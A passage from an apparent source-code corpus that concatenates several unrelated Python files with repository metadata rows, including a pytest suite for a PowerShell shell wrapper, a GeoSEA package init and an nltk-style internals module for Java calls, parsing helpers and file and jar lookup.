        _return_http_data_only=params.get("_return_http_data_only"),  # noqa: E501
        _preload_content=params.get("_preload_content", True),
        _request_timeout=params.get("_request_timeout"),
        collection_formats={},
    )
| 55.049153 | 747 | 0.650451 |
14b13c907ee02797804ddb65081e1a4bf02dba2d | 1,774 | py | Python | tests/shells/test_powershell.py | WorkInProgress-Development/theplease | 9b9a2dcee3efa0e1b4f197fc55904c9327dc13ba | [
"MIT"
] | null | null | null | tests/shells/test_powershell.py | WorkInProgress-Development/theplease | 9b9a2dcee3efa0e1b4f197fc55904c9327dc13ba | [
"MIT"
] | null | null | null | tests/shells/test_powershell.py | WorkInProgress-Development/theplease | 9b9a2dcee3efa0e1b4f197fc55904c9327dc13ba | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import pytest
from theplease.shells import Powershell
@pytest.mark.usefixtures('isfile', 'no_memoize', 'no_cache')
class TestPowershell(object):
@pytest.fixture
def shell(self):
return Powershell()
@pytest.fixture(autouse=True)
def Popen(self, mocker):
mock = mocker.patch('theplease.shells.powershell.Popen')
return mock
def test_and_(self, shell):
assert shell.and_('ls', 'cd') == '(ls) -and (cd)'
def test_app_alias(self, shell):
assert 'function please' in shell.app_alias('please')
assert 'function FUCK' in shell.app_alias('FUCK')
assert 'theplease' in shell.app_alias('please')
def test_how_to_configure(self, shell):
assert not shell.how_to_configure().can_configure_automatically
@pytest.mark.parametrize('side_effect, expected_version, call_args', [
([b'''Major Minor Build Revision
----- ----- ----- --------
5 1 17763 316 \n'''], 'PowerShell 5.1.17763.316', ['powershell.exe']),
([IOError, b'PowerShell 6.1.2\n'], 'PowerShell 6.1.2', ['powershell.exe', 'pwsh'])])
def test_info(self, side_effect, expected_version, call_args, shell, Popen):
Popen.return_value.stdout.read.side_effect = side_effect
assert shell.info() == expected_version
assert Popen.call_count == len(call_args)
assert all([Popen.call_args_list[i][0][0][0] == call_arg for i, call_arg in enumerate(call_args)])
def test_get_version_error(self, shell, Popen):
Popen.return_value.stdout.read.side_effect = RuntimeError
with pytest.raises(RuntimeError):
shell._get_version()
assert Popen.call_args[0][0] == ['powershell.exe', '$PSVersionTable.PSVersion']
| 39.422222 | 106 | 0.654453 |
4a2de158668ee3ab72ff4d5e4bdba3f2f56c0583 | 251 | py | Python | cryptodataaccess/Calculator/CalculatorStore.py | athanikos/cryptodataaccess | 6189a44c65a9b03c02822a534e865740ab488809 | [
"MIT"
] | null | null | null | cryptodataaccess/Calculator/CalculatorStore.py | athanikos/cryptodataaccess | 6189a44c65a9b03c02822a534e865740ab488809 | [
"MIT"
] | null | null | null | cryptodataaccess/Calculator/CalculatorStore.py | athanikos/cryptodataaccess | 6189a44c65a9b03c02822a534e865740ab488809 | [
"MIT"
] | null | null | null |
from abc import ABCMeta, abstractmethod
class CalculatorStore(metaclass=ABCMeta):
@abstractmethod
def insert_computed_notification(self):
pass
@abstractmethod
def fetch_computed_notification_before_date(self):
pass | 19.307692 | 54 | 0.74502 |
88405645b3c4eb2a5176688fb1fee78b388ba5f9 | 214 | py | Python | Clarinet/usermodel/IdealUser/__init__.py | rohans0509/Clarinet | 0a7a6a5e6a91f93956b6b5739cab1f030655cac8 | [
"MIT"
] | 1 | 2022-01-28T20:30:07.000Z | 2022-01-28T20:30:07.000Z | Clarinet/usermodel/IdealUser/__init__.py | rohans0509/Clarinet | 0a7a6a5e6a91f93956b6b5739cab1f030655cac8 | [
"MIT"
] | null | null | null | Clarinet/usermodel/IdealUser/__init__.py | rohans0509/Clarinet | 0a7a6a5e6a91f93956b6b5739cab1f030655cac8 | [
"MIT"
] | 2 | 2021-11-23T13:55:10.000Z | 2021-11-23T13:56:57.000Z | import miditoolkit
'''
==============
USE FUNCTION
==============
'''
def use(midi_file,*args,**kwargs):
channel=kwargs["channel"]
mido_obj = miditoolkit.midi.parser.MidiFile(midi_file)
return mido_obj | 19.454545 | 58 | 0.621495 |
1f3e92ae88c318db8d3e16174614a9de9c0873fd | 1,514 | py | Python | build/lib/geosea/__init__.py | py-geosea/geosea | c2bb56f72e2832098c910c57dbc6a935160c2cb4 | [
"MIT"
] | 1 | 2021-05-13T00:05:16.000Z | 2021-05-13T00:05:16.000Z | build/lib/geosea/__init__.py | py-geosea/geosea | c2bb56f72e2832098c910c57dbc6a935160c2cb4 | [
"MIT"
] | null | null | null | build/lib/geosea/__init__.py | py-geosea/geosea | c2bb56f72e2832098c910c57dbc6a935160c2cb4 | [
"MIT"
] | 1 | 2021-05-12T16:46:25.000Z | 2021-05-12T16:46:25.000Z | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Purpose: Convenience imports for geosea
# Author: Florian Petersen
# Katrin Hannemann
#
# GEOMAR Helmholtz Centre for Ocean Research Kiel, Germany
#
# Version: 1.21 August 2020
#
# -----------------------------------------------------------------------------
"""
GeoSEA: A Python Toolbox for seafloor geodesy
======================================================
GeoSEA is an open-source project to provide a pursuning Python tool for
seafloor gedetic data processing.
"""
from __future__ import absolute_import
import warnings
from .read import *
from .read_id import *
from .read_data import *
from .read_bsl import *
from .read_meta import *
from .read_tides import *
from .read_airpressure import *
from .proc_bsl import *
from .extract_df import *
from .search_df import *
from .create_df import *
from .range_sv import *
from .sw import *
from .replace import *
from .vert_bsl import *
from .hori_bsl import *
from .change2dateindex import *
from .change_dtype import *
from .compare_df import *
from .calc import *
global GMT_DATEFORMAT # Output date format
global IN_DATEFORMAT # Input date format
global PROJECTS # GeoSEA projects
GMT_DATEFORMAT = '%Y-%m-%dT%H:%M'
IN_DATEFORMAT = '%Y/%m/%d %H:%M:%S'
# MAR = MARSITE
# CHI = GeoSEA
# ETN = MARGOMET
PROJECTS = {'MAR' : '2014-11-16 00:00:00', 'CHI' : '2015-12-14 00:00:00', 'ETN' : '2016-04-15 00:00:00'}
| 23.65625 | 104 | 0.609643 |
9cd2adec526594135e46fdb123a072febd71c19f | 38,723 | py | Python | nltkma/internals.py | aydtmiri/nltk-ma | 5d7dd01844ee063fc910a648948624b6a2dddaf9 | [
"Apache-2.0"
] | null | null | null | nltkma/internals.py | aydtmiri/nltk-ma | 5d7dd01844ee063fc910a648948624b6a2dddaf9 | [
"Apache-2.0"
] | null | null | null | nltkma/internals.py | aydtmiri/nltk-ma | 5d7dd01844ee063fc910a648948624b6a2dddaf9 | [
"Apache-2.0"
] | null | null | null | # Natural Language Toolkit: Internal utility functions
#
# Copyright (C) 2001-2021 NLTK Project
# Author: Steven Bird <stevenbird1@gmail.com>
# Edward Loper <edloper@gmail.com>
# Nitin Madnani <nmadnani@ets.org>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
import subprocess
import os
import fnmatch
import re
import warnings
import textwrap
import types
import sys
import stat
import locale
from xml.etree import ElementTree
##########################################################################
# Java Via Command-Line
##########################################################################
# Path of the located Java binary; set lazily by ``config_java()``.
_java_bin = None
# Extra command-line options prepended to every ``java()`` invocation.
_java_options = []
# [xx] add classpath option to config_java?
def config_java(bin=None, options=None, verbose=False):
    """
    Configure nltk's java interface by telling it where the Java binary
    lives and which extra options to pass on every invocation.

    :param bin: Full path to the Java binary.  When omitted, the system
        is searched (honouring the JAVAHOME/JAVA_HOME environment
        variables); if no binary is found, a ``LookupError`` is raised.
    :type bin: str
    :param options: Options handed to the Java binary each time it is
        run (e.g. ``'-Xmx512m'`` to raise the maximum heap size).  A
        string is split on whitespace; ``None`` leaves the currently
        configured options unchanged.
    :type options: list(str)
    """
    global _java_bin, _java_options

    _java_bin = find_binary(
        "java",
        bin,
        env_vars=["JAVAHOME", "JAVA_HOME"],
        verbose=verbose,
        binary_names=["java.exe"],
    )

    if options is not None:
        # Accept either a whitespace-separated string or any iterable.
        _java_options = options.split() if isinstance(options, str) else list(options)
def java(cmd, classpath=None, stdin=None, stdout=None, stderr=None, blocking=True):
    """
    Execute the given java command, by opening a subprocess that calls
    Java.  If java has not yet been configured, it will be configured
    by calling ``config_java()`` with no arguments.

    :param cmd: The java command that should be called, formatted as
        a list of strings.  Typically, the first string will be the name
        of the java class; and the remaining strings will be arguments
        for that java class.
    :type cmd: list(str)
    :param classpath: A ``':'`` separated list of directories, JAR
        archives, and ZIP archives to search for class files.
    :type classpath: str
    :param stdin, stdout, stderr: Specify the executed program's
        standard input, standard output and standard error file
        handles, respectively.  Valid values are ``subprocess.PIPE``,
        an existing file descriptor (a positive integer), an existing
        file object, 'pipe', 'stdout', 'devnull' and None.
    :param blocking: If ``false``, return immediately after spawning
        the subprocess; the return value is then the ``Popen`` object.
    :return: ``(stdout, stderr)`` when blocking, else the ``Popen``.
    :raise OSError: If the java command returns a nonzero return code.
    """
    # Map the string aliases to the real subprocess constants; any other
    # value (file object, fd, None, subprocess constant) passes through.
    subprocess_output_dict = {
        "pipe": subprocess.PIPE,
        "stdout": subprocess.STDOUT,
        "devnull": subprocess.DEVNULL,
    }
    stdin = subprocess_output_dict.get(stdin, stdin)
    stdout = subprocess_output_dict.get(stdout, stdout)
    stderr = subprocess_output_dict.get(stderr, stderr)
    # A bare string would be passed to the shell unquoted; require a list.
    if isinstance(cmd, str):
        raise TypeError("cmd should be a list of strings")
    # Make sure we know where a java binary is.
    if _java_bin is None:
        config_java()
    # Set up the classpath.
    # NOTE(review): classpath=None (the default) reaches list(None) below
    # and raises TypeError -- callers are expected to always supply one.
    if isinstance(classpath, str):
        classpaths = [classpath]
    else:
        classpaths = list(classpath)
    classpath = os.path.pathsep.join(classpaths)
    # Construct the full command string.
    cmd = list(cmd)
    cmd = ["-cp", classpath] + cmd
    cmd = [_java_bin] + _java_options + cmd
    # Call java via a subprocess
    p = subprocess.Popen(cmd, stdin=stdin, stdout=stdout, stderr=stderr)
    if not blocking:
        return p
    (stdout, stderr) = p.communicate()
    # Check the return code.
    if p.returncode != 0:
        print(_decode_stdoutdata(stderr))
        raise OSError("Java command failed : " + str(cmd))
    return (stdout, stderr)
# NOTE(review): dead code -- the ``if 0:`` guard means this demo of the
# java() helper never executes; kept verbatim for reference.
if 0:
    # config_java(options='-Xmx512m')
    # Write:
    # java('weka.classifiers.bayes.NaiveBayes',
    #      ['-d', '/tmp/names.model', '-t', '/tmp/train.arff'],
    #      classpath='/Users/edloper/Desktop/weka/weka.jar')
    # Read:
    (a, b) = java(
        [
            "weka.classifiers.bayes.NaiveBayes",
            "-l",
            "/tmp/names.model",
            "-T",
            "/tmp/test.arff",
            "-p",
            "0",
        ],  # , '-distribution'],
        classpath="/Users/edloper/Desktop/weka/weka.jar",
    )
######################################################################
# Parsing
######################################################################
class ReadError(ValueError):
    """
    Raised by the ``read_*`` helpers when parsing fails.

    :param expected: What the parser expected to find.
    :param position: Index into the input string where the error occurred.
    """

    def __init__(self, expected, position):
        super().__init__(expected, position)
        self.expected = expected
        self.position = position

    def __str__(self):
        return "Expected %s at %s" % (self.expected, self.position)
_STRING_START_RE = re.compile(r"[uU]?[rR]?(\"\"\"|\'\'\'|\"|\')")


def read_str(s, start_position):
    """
    Parse a Python string literal beginning at ``start_position`` in ``s``.

    :param s: The string to scan.
    :type s: str
    :param start_position: Index at which the literal must begin.
    :type start_position: int
    :return: ``(value, end_position)`` -- the evaluated literal and the
        index just past its closing quote.
    :rtype: tuple(str, int)
    :raise ReadError: If no open quote is found at ``start_position``, if
        no matching close quote follows, or if the literal contains an
        invalid escape sequence.

    :Example:
    >>> from nltkma.internals import read_str
    >>> read_str('"Hello", World!', 0)
    ('Hello', 7)
    """
    # Match the opening quote together with any u/r prefixes.
    open_match = _STRING_START_RE.match(s, start_position)
    if open_match is None:
        raise ReadError("open quote", start_position)
    quotemark = open_match.group(1)

    # Scan for the matching close quote, hopping over escape sequences.
    _STRING_END_RE = re.compile(r"\\|%s" % quotemark)
    position = open_match.end()
    while True:
        end_match = _STRING_END_RE.search(s, position)
        if end_match is None:
            raise ReadError("close quote", position)
        if end_match.group(0) != "\\":
            break
        position = end_match.end() + 1

    # Evaluate the literal; invalid escapes surface as ValueError.
    try:
        return eval(s[start_position : end_match.end()]), end_match.end()
    except ValueError as e:
        raise ReadError("invalid string (%s)" % e) from e
_READ_INT_RE = re.compile(r"-?\d+")


def read_int(s, start_position):
    """
    Parse an integer beginning at ``start_position`` in ``s``.

    :param s: The string to scan.
    :type s: str
    :param start_position: Index at which the integer must begin.
    :type start_position: int
    :return: ``(value, end_position)`` -- the integer and the index just
        past its last digit.
    :rtype: tuple(int, int)
    :raise ReadError: If no integer starts at ``start_position``.

    :Example:
    >>> from nltkma.internals import read_int
    >>> read_int('42 is the answer', 0)
    (42, 2)
    """
    match = _READ_INT_RE.match(s, start_position)
    if match is None:
        raise ReadError("integer", start_position)
    return int(match.group()), match.end()
_READ_NUMBER_VALUE = re.compile(r"-?(\d*)([.]?\d*)?")


def read_number(s, start_position):
    """
    Parse an integer or float beginning at ``start_position`` in ``s``.

    :param s: The string to scan.
    :type s: str
    :param start_position: Index at which the number must begin.
    :type start_position: int
    :return: ``(value, end_position)`` -- an ``int`` when no fractional
        part is present, otherwise a ``float``, plus the index just past
        the number.
    :rtype: tuple(float, int)
    :raise ReadError: If no number starts at ``start_position``.

    :Example:
    >>> from nltkma.internals import read_number
    >>> read_number('Pi is 3.14159', 6)
    (3.14159, 13)
    """
    m = _READ_NUMBER_VALUE.match(s, start_position)
    # Both capture groups empty means the regex matched nothing useful.
    if m is None or not (m.group(1) or m.group(2)):
        raise ReadError("number", start_position)
    text = m.group()
    # A non-empty second group carries the decimal point -> float.
    if m.group(2):
        return float(text), m.end()
    return int(text), m.end()
######################################################################
# Check if a method has been overridden
######################################################################
def overridden(method):
    """
    :return: True if ``method`` overrides some method with the same
        name in a base class.  Typically used when defining abstract
        base classes, to let subclasses implement either of two related
        methods:

        >>> class EaterI:
        ...     '''Subclass must define eat() or batch_eat().'''
        ...     def eat(self, food):
        ...         if overridden(self.batch_eat):
        ...             return self.batch_eat([food])[0]
        ...         else:
        ...             raise NotImplementedError()
        ...     def batch_eat(self, foods):
        ...         return [self.eat(food) for food in foods]

    :type method: instance method
    :raise TypeError: If ``method`` is not a bound instance method.
    """
    if not (isinstance(method, types.MethodType) and method.__self__.__class__ is not None):
        raise TypeError("Expected an instance method.")
    name = method.__name__
    # Collect every class along the MRO that defines the name itself;
    # more than one definition means an override occurred somewhere.
    implementations = [
        klass.__dict__[name]
        for klass in _mro(method.__self__.__class__)
        if name in klass.__dict__
    ]
    return len(implementations) > 1


def _mro(cls):
    """
    Return the method resolution order for ``cls`` -- i.e., a list
    containing ``cls`` and all its base classes, in the order in which
    they would be checked by ``getattr``.  For new-style classes this is
    just ``cls.__mro__``; classic classes get a depth-first
    left-to-right traversal of ``__bases__``.
    """
    if isinstance(cls, type):
        return cls.__mro__
    order = [cls]
    for base in cls.__bases__:
        order.extend(_mro(base))
    return order
######################################################################
# Deprecation decorator & base class
######################################################################
# [xx] dedent msg first if it comes from a docstring.
def _add_epytext_field(obj, field, message):
    """Append an epytext ``@field: message`` entry to *obj*'s docstring."""
    indent = ""
    if obj.__doc__:
        # Separate the new field from the existing text with a blank
        # line, and mirror the docstring's smallest indentation.
        obj.__doc__ = obj.__doc__.rstrip() + "\n\n"
        indents = re.findall(r"(?<=\n)[ ]+(?!\s)", obj.__doc__.expandtabs())
        if indents:
            indent = min(indents)
    else:
        obj.__doc__ = ""
    obj.__doc__ += textwrap.fill(
        "@%s: %s" % (field, message),
        initial_indent=indent,
        subsequent_indent=indent + " ",
    )


def deprecated(message):
    """
    A decorator used to mark functions as deprecated.  A warning is
    printed whenever the decorated function is used.  Usage:

    >>> from nltkma.internals import deprecated
    >>> @deprecated('Use foo() instead')
    ... def bar(x):
    ...     print(x/10)
    """

    def _decorator(func):
        msg = "Function %s() has been deprecated. %s" % (func.__name__, message)
        msg = "\n" + textwrap.fill(msg, initial_indent=" ", subsequent_indent=" ")

        def wrapper(*args, **kwargs):
            warnings.warn(msg, category=DeprecationWarning, stacklevel=2)
            return func(*args, **kwargs)

        # Make the wrapper impersonate the wrapped function.
        wrapper.__dict__.update(func.__dict__)
        wrapper.__name__ = func.__name__
        wrapper.__doc__ = func.__doc__
        wrapper.__deprecated__ = True
        # Record the deprecation in the docstring as well.
        _add_epytext_field(wrapper, "deprecated", message)
        return wrapper

    return _decorator
class Deprecated:
    """
    A base class used to mark deprecated classes. A typical usage is to
    alert users that the name of a class has changed:
    >>> from nltkma.internals import Deprecated
    >>> class NewClassName:
    ...     pass # All logic goes here.
    ...
    >>> class OldClassName(Deprecated, NewClassName):
    ...     "Use NewClassName instead."
    The docstring of the deprecated class will be used in the
    deprecation warning message.
    """
    def __new__(cls, *args, **kwargs):
        # Figure out which class is the deprecated one: the first base in
        # the MRO that inherits directly from Deprecated.
        dep_cls = None
        for base in _mro(cls):
            if Deprecated in base.__bases__:
                dep_cls = base
                break
        assert dep_cls, "Unable to determine which base is deprecated."
        # Construct an appropriate warning.
        # Bug fix: the original `dep_cls.__doc__ or "".strip()` only
        # stripped the empty-string fallback (precedence); strip the
        # actual docstring instead.
        doc = (dep_cls.__doc__ or "").strip()
        # If there's a @deprecated field, strip off the field marker.
        doc = re.sub(r"\A\s*@deprecated:", r"", doc)
        # Strip off any indentation.
        doc = re.sub(r"(?m)^\s*", "", doc)
        # Construct a 'name' string.
        name = "Class %s" % dep_cls.__name__
        if cls != dep_cls:
            name += " (base class for %s)" % cls.__name__
        # Put it all together.
        msg = "%s has been deprecated. %s" % (name, doc)
        # Wrap it.
        msg = "\n" + textwrap.fill(msg, initial_indent=" ", subsequent_indent=" ")
        warnings.warn(msg, category=DeprecationWarning, stacklevel=2)
        # Do the actual work of __new__.
        return object.__new__(cls)
##########################################################################
# COUNTER, FOR UNIQUE NAMING
##########################################################################
class Counter:
    """A counter whose value auto-increments every time it is read."""

    def __init__(self, initial_value=0):
        # The value most recently handed out (or the seed, before any read).
        self._value = initial_value

    def get(self):
        """Increment the counter and return the new value."""
        self._value = self._value + 1
        return self._value
##########################################################################
# Search for files/binaries
##########################################################################
def find_file_iter(
    filename,
    env_vars=(),
    searchpath=(),
    file_names=None,
    url=None,
    verbose=False,
    finding_dir=False,
):
    """
    Search for a file to be used by nltk, yielding every existing
    candidate path in priority order: direct paths, environment
    variables, the explicit search path, then POSIX ``which``.
    Raises LookupError (with configuration hints) if nothing matched.

    :param filename: The name or path of the file.
    :param env_vars: A list of environment variable names to check.
    :param file_names: A list of alternative file names to check.
    :param searchpath: List of directories to search.
    :param url: URL presented to user for download help.
    :param verbose: Whether or not to print path when a file is found.
    :param finding_dir: If True, yield the raw value of each matching
        environment variable (treated as a directory) before the usual
        file checks.
    """
    file_names = [filename] + (file_names or [])
    assert isinstance(filename, str)
    assert not isinstance(file_names, str)
    assert not isinstance(searchpath, str)
    if isinstance(env_vars, str):
        env_vars = env_vars.split()
    # Tracks whether any candidate was produced, so we can raise at the end.
    yielded = False
    # File exists, no magic
    for alternative in file_names:
        # NOTE(review): joining `filename` with each alternative checks
        # <filename>/<alt> — presumably for when `filename` is itself an
        # install directory; confirm against callers.
        path_to_file = os.path.join(filename, alternative)
        if os.path.isfile(path_to_file):
            if verbose:
                print("[Found %s: %s]" % (filename, path_to_file))
            yielded = True
            yield path_to_file
        # Check the bare alternatives
        if os.path.isfile(alternative):
            if verbose:
                print("[Found %s: %s]" % (filename, alternative))
            yielded = True
            yield alternative
        # Check if the alternative is inside a 'file' directory
        path_to_file = os.path.join(filename, "file", alternative)
        if os.path.isfile(path_to_file):
            if verbose:
                print("[Found %s: %s]" % (filename, path_to_file))
            yielded = True
            yield path_to_file
    # Check environment variables
    for env_var in env_vars:
        if env_var in os.environ:
            if finding_dir: # This is to file a directory instead of file
                yielded = True
                yield os.environ[env_var]
            for env_dir in os.environ[env_var].split(os.pathsep):
                # Check if the environment variable contains a direct path to the bin
                if os.path.isfile(env_dir):
                    if verbose:
                        print("[Found %s: %s]" % (filename, env_dir))
                    yielded = True
                    yield env_dir
                # Check if the possible bin names exist inside the environment variable directories
                for alternative in file_names:
                    path_to_file = os.path.join(env_dir, alternative)
                    if os.path.isfile(path_to_file):
                        if verbose:
                            print("[Found %s: %s]" % (filename, path_to_file))
                        yielded = True
                        yield path_to_file
                    # Check if the alternative is inside a 'file' directory
                    # path_to_file = os.path.join(env_dir, 'file', alternative)
                    # Check if the alternative is inside a 'bin' directory
                    path_to_file = os.path.join(env_dir, "bin", alternative)
                    if os.path.isfile(path_to_file):
                        if verbose:
                            print("[Found %s: %s]" % (filename, path_to_file))
                        yielded = True
                        yield path_to_file
    # Check the path list.
    for directory in searchpath:
        for alternative in file_names:
            path_to_file = os.path.join(directory, alternative)
            if os.path.isfile(path_to_file):
                yielded = True
                yield path_to_file
    # If we're on a POSIX system, then try using the 'which' command
    # to find the file.
    if os.name == "posix":
        for alternative in file_names:
            try:
                p = subprocess.Popen(
                    ["which", alternative],
                    stdout=subprocess.PIPE,
                    stderr=subprocess.PIPE,
                )
                stdout, stderr = p.communicate()
                path = _decode_stdoutdata(stdout).strip()
                # `which` echoes the query on some systems; require a real file.
                if path.endswith(alternative) and os.path.exists(path):
                    if verbose:
                        print("[Found %s: %s]" % (filename, path))
                    yielded = True
                    yield path
            except (KeyboardInterrupt, SystemExit, OSError):
                raise
            finally:
                pass
    if not yielded:
        msg = (
            "NLTK was unable to find the %s file!"
            "\nUse software specific "
            "configuration parameters" % filename
        )
        if env_vars:
            msg += " or set the %s environment variable" % env_vars[0]
        msg += "."
        if searchpath:
            msg += "\n\n Searched in:"
            msg += "".join("\n - %s" % d for d in searchpath)
        if url:
            msg += "\n\n For more information on %s, see:\n <%s>" % (filename, url)
        div = "=" * 75
        raise LookupError("\n\n%s\n%s\n%s" % (div, msg, div))
def find_file(
    filename, env_vars=(), searchpath=(), file_names=None, url=None, verbose=False
):
    """Return the first hit from ``find_file_iter`` with the same arguments."""
    candidates = find_file_iter(filename, env_vars, searchpath, file_names, url, verbose)
    return next(candidates)
def find_dir(
    filename, env_vars=(), searchpath=(), file_names=None, url=None, verbose=False
):
    """Return the first directory hit from ``find_file_iter`` (finding_dir mode)."""
    candidates = find_file_iter(
        filename, env_vars, searchpath, file_names, url, verbose, finding_dir=True
    )
    return next(candidates)
def find_binary_iter(
    name,
    path_to_bin=None,
    env_vars=(),
    searchpath=(),
    binary_names=None,
    url=None,
    verbose=False,
):
    """
    Search for a binary to be used by nltk, yielding every candidate.
    Thin wrapper over ``find_file_iter``; ``path_to_bin`` takes
    precedence over ``name`` when supplied.

    :param name: The name or path of the file.
    :param path_to_bin: The user-supplied binary location (deprecated)
    :param env_vars: A list of environment variable names to check.
    :param binary_names: A list of alternative file names to check.
    :param searchpath: List of directories to search.
    :param url: URL presented to user for download help.
    :param verbose: Whether or not to print path when a file is found.
    """
    yield from find_file_iter(
        path_to_bin or name, env_vars, searchpath, binary_names, url, verbose
    )
def find_binary(
    name,
    path_to_bin=None,
    env_vars=(),
    searchpath=(),
    binary_names=None,
    url=None,
    verbose=False,
):
    """Return the first binary found by ``find_binary_iter``."""
    candidates = find_binary_iter(
        name, path_to_bin, env_vars, searchpath, binary_names, url, verbose
    )
    return next(candidates)
def find_jar_iter(
    name_pattern,
    path_to_jar=None,
    env_vars=(),
    searchpath=(),
    url=None,
    verbose=False,
    is_regex=False,
):
    """
    Search for a jar that is used by nltk, yielding every match found
    in: the explicit ``path_to_jar``, CLASSPATH entries, the other
    environment variables, then ``searchpath``. Raises LookupError
    with configuration hints when nothing matches.

    :param name_pattern: The name of the jar file
    :param path_to_jar: The user-supplied jar location, or None.
    :param env_vars: A list of environment variable names to check
                     in addition to the CLASSPATH variable which is
                     checked by default.
    :param searchpath: List of directories to search.
    :param url: URL presented to user for download help.
    :param verbose: Whether to print each path as it is found.
    :param is_regex: Whether name is a regular expression.
    """
    assert isinstance(name_pattern, str)
    assert not isinstance(searchpath, str)
    if isinstance(env_vars, str):
        env_vars = env_vars.split()
    # Tracks whether any candidate was produced, so we can raise at the end.
    yielded = False
    # Make sure we check the CLASSPATH first
    env_vars = ["CLASSPATH"] + list(env_vars)
    # If an explicit location was given, then check it, and yield it if
    # it's present; otherwise, complain.
    if path_to_jar is not None:
        if os.path.isfile(path_to_jar):
            yielded = True
            yield path_to_jar
        else:
            raise LookupError(
                "Could not find %s jar file at %s" % (name_pattern, path_to_jar)
            )
    # Check environment variables
    for env_var in env_vars:
        if env_var in os.environ:
            if env_var == "CLASSPATH":
                classpath = os.environ["CLASSPATH"]
                for cp in classpath.split(os.path.pathsep):
                    if os.path.isfile(cp):
                        filename = os.path.basename(cp)
                        # Match either by regex or by exact file name.
                        if (
                            is_regex
                            and re.match(name_pattern, filename)
                            or (not is_regex and filename == name_pattern)
                        ):
                            if verbose:
                                print("[Found %s: %s]" % (name_pattern, cp))
                            yielded = True
                            yield cp
                    # The case where user put directory containing the jar file in the classpath
                    if os.path.isdir(cp):
                        if not is_regex:
                            if os.path.isfile(os.path.join(cp, name_pattern)):
                                if verbose:
                                    print("[Found %s: %s]" % (name_pattern, cp))
                                yielded = True
                                yield os.path.join(cp, name_pattern)
                        else:
                            # Look for file using regular expression
                            for file_name in os.listdir(cp):
                                if re.match(name_pattern, file_name):
                                    if verbose:
                                        print(
                                            "[Found %s: %s]"
                                            % (
                                                name_pattern,
                                                os.path.join(cp, file_name),
                                            )
                                        )
                                    yielded = True
                                    yield os.path.join(cp, file_name)
            else:
                jar_env = os.environ[env_var]
                # The variable may point at a directory of jars or a single jar.
                jar_iter = (
                    (
                        os.path.join(jar_env, path_to_jar)
                        for path_to_jar in os.listdir(jar_env)
                    )
                    if os.path.isdir(jar_env)
                    else (jar_env,)
                )
                for path_to_jar in jar_iter:
                    if os.path.isfile(path_to_jar):
                        filename = os.path.basename(path_to_jar)
                        if (
                            is_regex
                            and re.match(name_pattern, filename)
                            or (not is_regex and filename == name_pattern)
                        ):
                            if verbose:
                                print("[Found %s: %s]" % (name_pattern, path_to_jar))
                            yielded = True
                            yield path_to_jar
    # Check the path list.
    for directory in searchpath:
        if is_regex:
            for filename in os.listdir(directory):
                path_to_jar = os.path.join(directory, filename)
                if os.path.isfile(path_to_jar):
                    if re.match(name_pattern, filename):
                        if verbose:
                            print("[Found %s: %s]" % (filename, path_to_jar))
                        yielded = True
                        yield path_to_jar
        else:
            path_to_jar = os.path.join(directory, name_pattern)
            if os.path.isfile(path_to_jar):
                if verbose:
                    print("[Found %s: %s]" % (name_pattern, path_to_jar))
                yielded = True
                yield path_to_jar
    if not yielded:
        # If nothing was found, raise an error
        msg = "NLTK was unable to find %s!" % name_pattern
        if env_vars:
            msg += " Set the %s environment variable" % env_vars[0]
        msg = textwrap.fill(msg + ".", initial_indent=" ", subsequent_indent=" ")
        if searchpath:
            msg += "\n\n Searched in:"
            msg += "".join("\n - %s" % d for d in searchpath)
        if url:
            msg += "\n\n For more information, on %s, see:\n <%s>" % (
                name_pattern,
                url,
            )
        div = "=" * 75
        raise LookupError("\n\n%s\n%s\n%s" % (div, msg, div))
def find_jar(
    name_pattern,
    path_to_jar=None,
    env_vars=(),
    searchpath=(),
    url=None,
    verbose=False,
    is_regex=False,
):
    """Return the first jar found by ``find_jar_iter``."""
    candidates = find_jar_iter(
        name_pattern, path_to_jar, env_vars, searchpath, url, verbose, is_regex
    )
    return next(candidates)
def find_jars_within_path(path_to_jars):
    """Return the paths of all ``*.jar`` files found under *path_to_jars*."""
    jars = []
    for root, _dirs, files in os.walk(path_to_jars):
        for jar_name in fnmatch.filter(files, "*.jar"):
            jars.append(os.path.join(root, jar_name))
    return jars
def _decode_stdoutdata(stdoutdata):
""" Convert data read from stdout/stderr to unicode """
if not isinstance(stdoutdata, bytes):
return stdoutdata
encoding = getattr(sys.__stdout__, "encoding", locale.getpreferredencoding())
if encoding is None:
return stdoutdata.decode()
return stdoutdata.decode(encoding)
##########################################################################
# Import Stdlib Module
##########################################################################
def import_from_stdlib(module):
    """
    Import *module* with the current directory removed from ``sys.path``.

    When python is run from within the nltk/ directory tree, the
    current directory is included at the beginning of the search path.
    Unfortunately, that means that modules within nltk can sometimes
    shadow standard library modules. As an example, the stdlib
    'inspect' module will attempt to import the stdlib 'tokenize'
    module, but will instead end up importing NLTK's 'tokenize' module
    instead (causing the import to fail).

    :param module: dotted module name to import.
    :return: the imported module object.
    """
    old_path = sys.path
    sys.path = [d for d in sys.path if d not in ("", ".")]
    try:
        # Bug fix: restore sys.path even when the import raises, so a
        # failed import no longer leaves the path permanently filtered.
        m = __import__(module)
    finally:
        sys.path = old_path
    return m
##########################################################################
# Wrapper for ElementTree Elements
##########################################################################
class ElementWrapper:
    """
    A wrapper around ElementTree Element objects whose main purpose is
    to provide nicer __repr__ and __str__ methods. In addition, any
    of the wrapped Element's methods that return other Element objects
    are overridden to wrap those values before returning them.
    This makes Elements more convenient to work with in
    interactive sessions and doctests, at the expense of some
    efficiency.
    """
    # Prevent double-wrapping:
    def __new__(cls, etree):
        """
        Create and return a wrapper around a given Element object.
        If ``etree`` is an ``ElementWrapper``, then ``etree`` is
        returned as-is.
        """
        if isinstance(etree, ElementWrapper):
            return etree
        else:
            return object.__new__(ElementWrapper)
    def __init__(self, etree):
        r"""
        Initialize a new Element wrapper for ``etree``.
        If ``etree`` is a string, then it will be converted to an
        Element object using ``ElementTree.fromstring()`` first:
        >>> ElementWrapper("<test></test>")
        <Element "<?xml version='1.0' encoding='utf8'?>\n<test />">
        """
        if isinstance(etree, str):
            etree = ElementTree.fromstring(etree)
        # Stored via __dict__ to bypass our own __setattr__ delegation.
        self.__dict__["_etree"] = etree
    def unwrap(self):
        """
        Return the Element object wrapped by this wrapper.
        """
        return self._etree
    ##////////////////////////////////////////////////////////////
    # { String Representation
    ##////////////////////////////////////////////////////////////
    def __repr__(self):
        # Abbreviate long serializations, trying to cut at a tag boundary.
